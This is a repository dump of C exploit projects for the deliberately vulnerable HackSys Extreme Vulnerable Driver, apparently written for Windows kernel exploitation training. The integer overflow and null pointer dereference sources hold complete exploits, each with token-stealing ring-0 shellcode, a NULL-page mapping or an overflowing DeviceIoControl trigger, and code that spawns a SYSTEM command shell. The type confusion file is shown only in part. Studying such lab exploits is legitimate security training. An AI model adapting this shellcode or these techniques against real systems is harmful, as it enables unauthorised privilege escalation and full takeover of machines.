├── HS-IntegerOverflow ├── HS-IntegerOverflow.sln └── HS-IntegerOverflow │ ├── HS-IntegerOverflow.c │ ├── HS-IntegerOverflow.h │ ├── HS-IntegerOverflow.vcxproj │ └── HS-IntegerOverflow.vcxproj.filters ├── HS-NullPointerDereference ├── HS-NullPointerDereference.sln └── HS-NullPointerDereference │ ├── HS-NullPointerDereference.c │ ├── HS-NullPointerDereference.h │ ├── HS-NullPointerDereference.vcxproj │ └── HS-NullPointerDereference.vcxproj.filters ├── HS-TypeConfusion ├── HS-TypeConfusion.sln └── HS-TypeConfusion │ ├── HS-TypeConfusion.c │ ├── HS-TypeConfusion.h │ ├── HS-TypeConfusion.vcxproj │ └── HS-TypeConfusion.vcxproj.filters ├── HS-UninitializedStackVariable ├── HS-UninitializedStackVariable.sln └── HS-UninitializedStackVariable │ ├── HS-UninitializedStackVariable.c │ ├── HS-UninitializedStackVariable.h │ ├── HS-UninitializedStackVariable.vcxproj │ └── HS-UninitializedStackVariable.vcxproj.filters └── README.md /HS-IntegerOverflow/HS-IntegerOverflow.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.24720.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HS-IntegerOverflow", "HS-IntegerOverflow\HS-IntegerOverflow.vcxproj", "{F2510126-6583-498C-A9B1-D821264B7135}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {F2510126-6583-498C-A9B1-D821264B7135}.Debug|x64.ActiveCfg = Debug|x64 17 | {F2510126-6583-498C-A9B1-D821264B7135}.Debug|x64.Build.0 = Debug|x64 18 | {F2510126-6583-498C-A9B1-D821264B7135}.Debug|x86.ActiveCfg = Debug|Win32 19 | {F2510126-6583-498C-A9B1-D821264B7135}.Debug|x86.Build.0 = Debug|Win32 20 | {F2510126-6583-498C-A9B1-D821264B7135}.Release|x64.ActiveCfg = Release|x64 21 | {F2510126-6583-498C-A9B1-D821264B7135}.Release|x64.Build.0 = Release|x64 22 | {F2510126-6583-498C-A9B1-D821264B7135}.Release|x86.ActiveCfg = Release|Win32 23 | {F2510126-6583-498C-A9B1-D821264B7135}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /HS-IntegerOverflow/HS-IntegerOverflow/HS-IntegerOverflow.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "HS-IntegerOverflow.h" 5 | 6 | 7 | BOOL IsSystem(VOID) 8 | { 9 | DWORD dwSize = 0, dwResult = 0; 10 | HANDLE hToken = NULL; 11 | PTOKEN_USER Ptoken_User; 12 | LPWSTR SID = NULL; 13 | 14 | // Open a handle to the access token for the calling process. 15 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 16 | return FALSE; 17 | } 18 | 19 | // Call GetTokenInformation to get the buffer size. 20 | if (!GetTokenInformation(hToken, TokenUser, NULL, dwSize, &dwSize)) { 21 | dwResult = GetLastError(); 22 | if (dwResult != ERROR_INSUFFICIENT_BUFFER) { 23 | return FALSE; 24 | } 25 | } 26 | 27 | // Allocate the buffer. 28 | Ptoken_User = (PTOKEN_USER)GlobalAlloc(GPTR, dwSize); 29 | 30 | // Call GetTokenInformation again to get the group information. 31 | if (!GetTokenInformation(hToken, TokenUser, Ptoken_User, dwSize, &dwSize)) { 32 | return FALSE; 33 | } 34 | if (!ConvertSidToStringSidW(Ptoken_User->User.Sid, &SID)) { 35 | return FALSE; 36 | } 37 | 38 | if (_wcsicmp(L"S-1-5-18", SID) != 0) { 39 | return FALSE; 40 | } 41 | if (Ptoken_User) GlobalFree(Ptoken_User); 42 | 43 | return TRUE; 44 | } 45 | 46 | 47 | void PopShell() 48 | { 49 | STARTUPINFO si = { sizeof(STARTUPINFO) }; 50 | PROCESS_INFORMATION pi; 51 | 52 | ZeroMemory(&si, sizeof(si)); 53 | si.cb = sizeof(si); 54 | ZeroMemory(&pi, sizeof(pi)); 55 | 56 | CreateProcess(L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); 57 | 58 | } 59 | 60 | 61 | int wmain(int argc, wchar_t* argv[]) 62 | { 63 | OSVERSIONINFOEXW osInfo; 64 | TCHAR chOSMajorMinor[8]; 65 | LPVOID lpvPayload; 66 | HANDLE hDevice; 67 | LPCWSTR lpDeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver"; 68 | BOOL bResult = FALSE; 69 | 70 | CHAR ShellCode[] = "\x60" // pushad ; Save register state on the Stack 71 | "\x64\xA1\x24\x01\x00\x00" // mov eax, fs:[KTHREAD_OFFSET] ; nt!_KPCR.PcrbData.CurrentThread 72 | "\x8B\x40\x50" // mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD.ApcState.Process 73 | "\x89\xC1" // mov ecx, eax (Current _EPROCESS structure) 74 | "\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET] ; nt!_EPROCESS.Token 75 | //---[Copy System PID token] 76 | "\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID) ; PID 4 -> System 77 | "\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-| ; nt!_EPROCESS.ActiveProcessLinks.Flink 78 | "\x2D\xB8\x00\x00\x00" // sub eax, FLINK_OFFSET | 79 | "\x39\x90\xB4\x00\x00\x00" // cmp [eax + PID_OFFSET], edx | ; nt!_EPROCESS.UniqueProcessId 80 | "\x75\xED" // jnz ->| ; Loop !(PID=4) 81 | "\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET] ; System nt!_EPROCESS.Token 82 | "\x89\x91\xF8\x00\x00\x00" // mov [ecx + TOKEN_OFFSET], edx ; Replace Current Process token 83 | //---[Recover] 84 | "\x61" // popad ; Restore register state from the Stack 85 | "\x31\xC0" // NTSTATUS -> STATUS_SUCCESS :p 86 | "\x5D" // pop ebp 87 | "\xC2\x08\x00" // ret 8 88 | ; 89 | 90 | wprintf(L" __ __ __ ____ \n"); 91 | wprintf(L" / // /__ _____/ /__ / __/_ _____ \n"); 92 | wprintf(L" / _ / _ `/ __/ '_/_\\ \\/ // (_-< \n"); 93 | wprintf(L" /_//_/\\_,_/\\__/_/\\_\\/___/\\_, /___/ \n"); 94 | wprintf(L" /___/ \n"); 95 | wprintf(L" \n"); 96 | wprintf(L" Extreme Vulnerable Driver \n"); 97 | wprintf(L" Integer Overflow \n\n"); 98 | 99 | // Get OS Version/Architecture 100 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 101 | 102 | _RtlGetVersion RtlGetVersion = (_RtlGetVersion) 103 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion"); 104 | if (RtlGetVersion == NULL) { 105 | wprintf(L" -> Unable to get Module handle!\n\n"); 106 | exit(1); 107 | } 108 | 109 | RtlGetVersion(&osInfo); 110 | 111 | swprintf_s(chOSMajorMinor, sizeof(chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion); 112 | 113 | if (_wcsicmp(chOSMajorMinor, L"6.1") == 0 && sizeof(LPVOID) == 4) { 114 | wprintf(L" [*] Exploit running on Windows Version: 7 or Server 2008 x86 build %u \n\n", osInfo.dwBuildNumber); 115 | } 116 | else { 117 | wprintf(L" [!] This exploit has only been tested on Windows 7 x86 build 7601 \n\n"); 118 | exit(1); 119 | } 120 | 121 | wprintf(L" [*] Allocating Ring0 Payload"); 122 | 123 | lpvPayload = VirtualAlloc( 124 | NULL, // Next page to commit 125 | sizeof(ShellCode), // Page size, in bytes 126 | MEM_COMMIT | MEM_RESERVE, // Allocate a committed page 127 | PAGE_EXECUTE_READWRITE); // Read/write access 128 | if (lpvPayload == NULL) 129 | { 130 | wprintf(L" -> Unable to reserve Memory!\n\n"); 131 | exit(1); 132 | } 133 | 134 | wprintf(L" -> Done!\n"); 135 | 136 | memcpy(lpvPayload, ShellCode, sizeof(ShellCode)); 137 | 138 | wprintf(L" [+] Ring0 Payload available at: 0x%p \n\n", lpvPayload); 139 | wprintf(L" [*] Trying to get a handle to the following Driver: %ls", lpDeviceName); 140 | 141 | hDevice = CreateFile(lpDeviceName, // Name of the write 142 | GENERIC_READ | GENERIC_WRITE, // Open for reading/writing 143 | FILE_SHARE_WRITE, // Allow Share 144 | NULL, // Default security 145 | OPEN_EXISTING, // Opens a file or device, only if it exists. 146 | FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, // Normal file 147 | NULL); // No attr. template 148 | 149 | if (hDevice == INVALID_HANDLE_VALUE) 150 | { 151 | wprintf(L" -> Unable to get Driver handle!\n\n"); 152 | exit(1); 153 | } 154 | 155 | wprintf(L" -> Done!\n"); 156 | wprintf(L" [+] Our Device Handle: 0x%p \n\n", hDevice); 157 | 158 | ULONG ulTerminatorValue = 0xBAD0B0B0; 159 | PULONG pTerminatorValue = &ulTerminatorValue; 160 | 161 | CHAR *chBuffer; 162 | chBuffer = (CHAR *)malloc(2096); 163 | SecureZeroMemory(chBuffer, 2096); 164 | memcpy(chBuffer + 2088, &lpvPayload, 4); 165 | memcpy(chBuffer + 2092, pTerminatorValue, 4); 166 | 167 | wprintf(L" [*] Lets send some Bytes to our Driver"); 168 | 169 | DWORD dwSize = 0xFFFFFFFF; // Trigger Integer Overflow 170 | 171 | DWORD junk = 0; // Discard results 172 | 173 | bResult = DeviceIoControl(hDevice, // Device to be queried 174 | 0x222027, // Operation to perform 175 | chBuffer, dwSize, // Input Buffer 176 | NULL, 0, // Output Buffer 177 | &junk, // # Bytes returned 178 | (LPOVERLAPPED)NULL); // Synchronous I/O 179 | if (!bResult) { 180 | wprintf(L" -> Failed to send Data!\n\n"); 181 | CloseHandle(hDevice); 182 | exit(1); 183 | } 184 | 185 | wprintf(L" -> Done!\n\n"); 186 | 187 | BOOL isGodMode = IsSystem(); 188 | if (!isGodMode) { 189 | wprintf(L" [!] Exploit Failed :( \n\n"); 190 | CloseHandle(hDevice); 191 | exit(1); 192 | } 193 | 194 | PopShell(); 195 | wprintf(L" [!] Enjoy your Shell and Thank You for Flying Ring0 Airways ;) \n\n"); 196 | 197 | CloseHandle(hDevice); 198 | 199 | return (0); 200 | } 201 | -------------------------------------------------------------------------------- /HS-IntegerOverflow/HS-IntegerOverflow/HS-IntegerOverflow.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | typedef NTSTATUS(NTAPI *_RtlGetVersion)( 6 | LPOSVERSIONINFOEXW lpVersionInformation 7 | ); 8 | -------------------------------------------------------------------------------- /HS-IntegerOverflow/HS-IntegerOverflow/HS-IntegerOverflow.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {F2510126-6583-498C-A9B1-D821264B7135} 23 | HSIntegerOverflow 24 | 8.1 25 | 26 | 27 | 28 | Application 29 | true 30 | v140 31 | Unicode 32 | 33 | 34 | Application 35 | false 36 | v140 37 | true 38 | Unicode 39 | 40 | 41 | Application 42 | true 43 | v140 44 | Unicode 45 | 46 | 47 | Application 48 | false 49 | v140 50 | true 51 | Unicode 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | Level3 75 | Disabled 76 | true 77 | MultiThreaded 78 | 79 | 80 | 81 | 82 | Level3 83 | Disabled 84 | true 85 | MultiThreaded 86 | 87 | 88 | 89 | 90 | Level3 91 | MaxSpeed 92 | true 93 | true 94 | true 95 | MultiThreaded 96 | 97 | 98 | true 99 | true 100 | 101 | 102 | 103 | 104 | Level3 105 | MaxSpeed 106 | true 107 | true 108 | true 109 | MultiThreaded 110 | 111 | 112 | true 113 | true 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | -------------------------------------------------------------------------------- /HS-IntegerOverflow/HS-IntegerOverflow/HS-IntegerOverflow.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /HS-NullPointerDereference/HS-NullPointerDereference.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.24720.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HS-NullPointerDereference", "HS-NullPointerDereference\HS-NullPointerDereference.vcxproj", "{075C2AE4-532B-405D-98A2-0F4791B09ED0}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Debug|x64.ActiveCfg = Debug|x64 17 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Debug|x64.Build.0 = Debug|x64 18 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Debug|x86.ActiveCfg = Debug|Win32 19 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Debug|x86.Build.0 = Debug|Win32 20 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Release|x64.ActiveCfg = Release|x64 21 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Release|x64.Build.0 = Release|x64 22 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Release|x86.ActiveCfg = Release|Win32 23 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /HS-NullPointerDereference/HS-NullPointerDereference/HS-NullPointerDereference.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "HS-NullPointerDereference.h" 5 | 6 | 7 | BOOL IsSystem(VOID) 8 | { 9 | DWORD dwSize = 0, dwResult = 0; 10 | HANDLE hToken = NULL; 11 | PTOKEN_USER Ptoken_User; 12 | LPWSTR SID = NULL; 13 | 14 | // Open a handle to the access token for the calling process. 15 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 16 | return FALSE; 17 | } 18 | 19 | // Call GetTokenInformation to get the buffer size. 20 | if (!GetTokenInformation(hToken, TokenUser, NULL, dwSize, &dwSize)) { 21 | dwResult = GetLastError(); 22 | if (dwResult != ERROR_INSUFFICIENT_BUFFER) { 23 | return FALSE; 24 | } 25 | } 26 | 27 | // Allocate the buffer. 28 | Ptoken_User = (PTOKEN_USER)GlobalAlloc(GPTR, dwSize); 29 | 30 | // Call GetTokenInformation again to get the group information. 31 | if (!GetTokenInformation(hToken, TokenUser, Ptoken_User, dwSize, &dwSize)) { 32 | return FALSE; 33 | } 34 | if (!ConvertSidToStringSidW(Ptoken_User->User.Sid, &SID)) { 35 | return FALSE; 36 | } 37 | 38 | if (_wcsicmp(L"S-1-5-18", SID) != 0) { 39 | return FALSE; 40 | } 41 | if (Ptoken_User) GlobalFree(Ptoken_User); 42 | 43 | return TRUE; 44 | } 45 | 46 | 47 | void PopShell() 48 | { 49 | STARTUPINFO si = { sizeof(STARTUPINFO) }; 50 | PROCESS_INFORMATION pi; 51 | 52 | ZeroMemory(&si, sizeof(si)); 53 | si.cb = sizeof(si); 54 | ZeroMemory(&pi, sizeof(pi)); 55 | 56 | CreateProcess(L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); 57 | 58 | } 59 | 60 | 61 | int wmain(int argc, wchar_t* argv[]) 62 | { 63 | OSVERSIONINFOEXW osInfo; 64 | TCHAR chOSMajorMinor[8]; 65 | LPVOID lpvPayload; 66 | HANDLE hDevice; 67 | LPCWSTR lpDeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver"; 68 | BOOL bResult = FALSE; 69 | 70 | CHAR ShellCode[] = "\x60" // pushad ; Save register state on the Stack 71 | "\x64\xA1\x24\x01\x00\x00" // mov eax, fs:[KTHREAD_OFFSET] ; nt!_KPCR.PcrbData.CurrentThread 72 | "\x8B\x40\x50" // mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD.ApcState.Process 73 | "\x89\xC1" // mov ecx, eax (Current _EPROCESS structure) 74 | "\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET] ; nt!_EPROCESS.Token 75 | //---[Copy System PID token] 76 | "\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID) ; PID 4 -> System 77 | "\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-| ; nt!_EPROCESS.ActiveProcessLinks.Flink 78 | "\x2D\xB8\x00\x00\x00" // sub eax, FLINK_OFFSET | 79 | "\x39\x90\xB4\x00\x00\x00" // cmp [eax + PID_OFFSET], edx | ; nt!_EPROCESS.UniqueProcessId 80 | "\x75\xED" // jnz ->| ; Loop !(PID=4) 81 | "\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET] ; System nt!_EPROCESS.Token 82 | "\x89\x91\xF8\x00\x00\x00" // mov [ecx + TOKEN_OFFSET], edx ; Replace Current Process token 83 | //---[Recover] 84 | "\x61" // popad ; Restore register state from the Stack 85 | "\xC3" // ret 86 | ; 87 | 88 | wprintf(L" __ __ __ ____ \n"); 89 | wprintf(L" / // /__ _____/ /__ / __/_ _____ \n"); 90 | wprintf(L" / _ / _ `/ __/ '_/_\\ \\/ // (_-< \n"); 91 | wprintf(L" /_//_/\\_,_/\\__/_/\\_\\/___/\\_, /___/ \n"); 92 | wprintf(L" /___/ \n"); 93 | wprintf(L" \n"); 94 | wprintf(L" Extreme Vulnerable Driver \n"); 95 | wprintf(L" Null Pointer Dereference \n\n"); 96 | 97 | // Get OS Version/Architecture 98 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 99 | 100 | _RtlGetVersion RtlGetVersion = (_RtlGetVersion) 101 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion"); 102 | if (RtlGetVersion == NULL) { 103 | wprintf(L" -> Unable to get Module handle!\n\n"); 104 | exit(1); 105 | } 106 | 107 | RtlGetVersion(&osInfo); 108 | 109 | swprintf_s(chOSMajorMinor, sizeof(chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion); 110 | 111 | if (_wcsicmp(chOSMajorMinor, L"6.1") == 0 && sizeof(LPVOID) == 4) { 112 | wprintf(L" [*] Exploit running on Windows Version: 7 or Server 2008 x86 build %u \n\n", osInfo.dwBuildNumber); 113 | } 114 | else { 115 | wprintf(L" [!] This exploit has only been tested on Windows 7 x86 build 7601 \n\n"); 116 | exit(1); 117 | } 118 | 119 | wprintf(L" [*] Allocating Ring0 Payload"); 120 | 121 | lpvPayload = VirtualAlloc( 122 | NULL, // Next page to commit 123 | sizeof(ShellCode), // Page size, in bytes 124 | MEM_COMMIT | MEM_RESERVE, // Allocate a committed page 125 | PAGE_EXECUTE_READWRITE); // Read/write access 126 | if (lpvPayload == NULL) 127 | { 128 | wprintf(L" -> Unable to reserve Memory!\n\n"); 129 | exit(1); 130 | } 131 | 132 | wprintf(L" -> Done!\n"); 133 | 134 | memcpy(lpvPayload, ShellCode, sizeof(ShellCode)); 135 | 136 | wprintf(L" [+] Ring0 Payload available at: 0x%p \n\n", lpvPayload); 137 | wprintf(L" [*] Allocating a NULL Page in current Process"); 138 | 139 | PVOID pBaseAddr = (PVOID)0x1; 140 | ULONG uSize = 0x1000; 141 | NTSTATUS Status; 142 | 143 | _NtAllocateVirtualMemory NtAllocateVirtualMemory = (_NtAllocateVirtualMemory) 144 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory"); 145 | if (NtAllocateVirtualMemory == NULL) { 146 | return NULL; 147 | } 148 | 149 | Status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBaseAddr, 0, &uSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 150 | 151 | if (Status != 0) { 152 | wprintf(L" -> Unable to Allocate NULL Page!\n\n"); 153 | exit(1); 154 | } 155 | 156 | memcpy((PUCHAR)NULL + sizeof(ULONG), &lpvPayload, sizeof(LPVOID)); 157 | 158 | wprintf(L" -> Done!\n"); 159 | wprintf(L" [+] NULL_POINTER_DEREFERENCE Callback Function available at: 0x%p \n", (PUCHAR)NULL + sizeof(ULONG)); 160 | wprintf(L" [+] NULL_POINTER_DEREFERENCE Callback Function contains: 0x%p \n\n", lpvPayload); 161 | 162 | wprintf(L" [*] Trying to get a handle to the following Driver: %ls", lpDeviceName); 163 | 164 | hDevice = CreateFile(lpDeviceName, // Name of the write 165 | GENERIC_READ | GENERIC_WRITE, // Open for reading/writing 166 | FILE_SHARE_WRITE, // Allow Share 167 | NULL, // Default security 168 | OPEN_EXISTING, // Opens a file or device, only if it exists. 169 | FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, // Normal file 170 | NULL); // No attr. template 171 | 172 | if (hDevice == INVALID_HANDLE_VALUE) 173 | { 174 | wprintf(L" -> Unable to get Driver handle!\n\n"); 175 | exit(1); 176 | } 177 | 178 | wprintf(L" -> Done!\n"); 179 | wprintf(L" [+] Our Device Handle: 0x%p \n\n", hDevice); 180 | wprintf(L" [*] Lets send some Bytes to our Driver and trigger the Null Pointer Dereference"); 181 | 182 | ULONG ulMagic = 0xB03FB03F; 183 | LPVOID lpBuffer = &ulMagic; 184 | 185 | DWORD junk = 0; // Discard results 186 | 187 | bResult = DeviceIoControl(hDevice, // Device to be queried 188 | 0x22202B, // Operation to perform 189 | lpBuffer, sizeof(lpBuffer), // Input Buffer 190 | NULL, 0, // Output Buffer 191 | &junk, // # Bytes returned 192 | (LPOVERLAPPED)NULL); // Synchronous I/O 193 | if (!bResult) { 194 | wprintf(L" -> Failed to send Data!\n\n"); 195 | CloseHandle(hDevice); 196 | exit(1); 197 | } 198 | 199 | wprintf(L" -> Done!\n\n"); 200 | 201 | BOOL isGodMode = IsSystem(); 202 | if (!isGodMode) { 203 | wprintf(L" [!] Exploit Failed :( \n\n"); 204 | CloseHandle(hDevice); 205 | exit(1); 206 | } 207 | 208 | PopShell(); 209 | wprintf(L" [!] Enjoy your Shell and Thank You for Flying Ring0 Airways ;) \n\n"); 210 | 211 | CloseHandle(hDevice); 212 | 213 | return (0); 214 | } 215 | -------------------------------------------------------------------------------- /HS-NullPointerDereference/HS-NullPointerDereference/HS-NullPointerDereference.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | typedef NTSTATUS(NTAPI *_RtlGetVersion)( 6 | LPOSVERSIONINFOEXW lpVersionInformation 7 | ); 8 | 9 | typedef NTSTATUS(NTAPI *_NtAllocateVirtualMemory)( 10 | HANDLE ProcessHandle, 11 | PVOID *BaseAddress, 12 | ULONG ZeroBits, 13 | PULONG RegionSize, 14 | ULONG AllocationType, 15 | ULONG Protect 16 | ); 17 | -------------------------------------------------------------------------------- /HS-NullPointerDereference/HS-NullPointerDereference/HS-NullPointerDereference.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {075C2AE4-532B-405D-98A2-0F4791B09ED0} 23 | HSNullPointerDereference 24 | 8.1 25 | 26 | 27 | 28 | Application 29 | true 30 | v140 31 | Unicode 32 | 33 | 34 | Application 35 | false 36 | v140 37 | true 38 | Unicode 39 | 40 | 41 | Application 42 | true 43 | v140 44 | MultiByte 45 | 46 | 47 | Application 48 | false 49 | v140 50 | true 51 | MultiByte 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | Level3 75 | Disabled 76 | true 77 | 78 | 79 | 80 | 81 | Level3 82 | Disabled 83 | true 84 | 85 | 86 | 87 | 88 | Level3 89 | MaxSpeed 90 | true 91 | true 92 | true 93 | MultiThreaded 94 | 95 | 96 | true 97 | true 98 | 99 | 100 | 101 | 102 | Level3 103 | MaxSpeed 104 | true 105 | true 106 | true 107 | 108 | 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | -------------------------------------------------------------------------------- /HS-NullPointerDereference/HS-NullPointerDereference/HS-NullPointerDereference.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /HS-TypeConfusion/HS-TypeConfusion.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.24720.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HS-TypeConfusion", "HS-TypeConfusion\HS-TypeConfusion.vcxproj", "{B45D84E0-2352-4930-A4CD-786D7943A858}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Debug|x64.ActiveCfg = Debug|x64 17 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Debug|x64.Build.0 = Debug|x64 18 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Debug|x86.ActiveCfg = Debug|Win32 19 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Debug|x86.Build.0 = Debug|Win32 20 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Release|x64.ActiveCfg = Release|x64 21 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Release|x64.Build.0 = Release|x64 22 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Release|x86.ActiveCfg = Release|Win32 23 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /HS-TypeConfusion/HS-TypeConfusion/HS-TypeConfusion.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "HS-TypeConfusion.h" 5 | 6 | 7 | BOOL IsSystem(VOID) 8 | { 9 | DWORD dwSize = 0, dwResult = 0; 10 | HANDLE hToken = NULL; 11 | PTOKEN_USER Ptoken_User; 12 | LPWSTR SID = NULL; 13 | 14 | // Open a handle to the access token for the calling process. 15 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 16 | return FALSE; 17 | } 18 | 19 | // Call GetTokenInformation to get the buffer size. 20 | if (!GetTokenInformation(hToken, TokenUser, NULL, dwSize, &dwSize)) { 21 | dwResult = GetLastError(); 22 | if (dwResult != ERROR_INSUFFICIENT_BUFFER) { 23 | return FALSE; 24 | } 25 | } 26 | 27 | // Allocate the buffer. 28 | Ptoken_User = (PTOKEN_USER)GlobalAlloc(GPTR, 